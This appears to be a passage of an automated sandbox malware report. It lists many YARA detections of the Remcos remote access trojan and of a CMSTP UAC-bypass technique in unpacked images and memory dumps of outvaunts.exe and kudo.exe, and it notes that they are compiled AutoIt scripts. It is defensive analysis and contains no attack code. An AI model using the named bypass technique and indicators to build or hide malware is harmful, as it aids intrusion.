              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: This is a third-party compiled AutoIt script.5_2_00803B3A
              Source: kudo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: kudo.exe, 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f8fd8a02-e
              Source: kudo.exe, 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bfc4d300-0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: This is a third-party compiled AutoIt script.6_2_01363B3A
              Source: outvaunts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: outvaunts.exe, 00000006.00000002.461070341.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a04bfb03-1
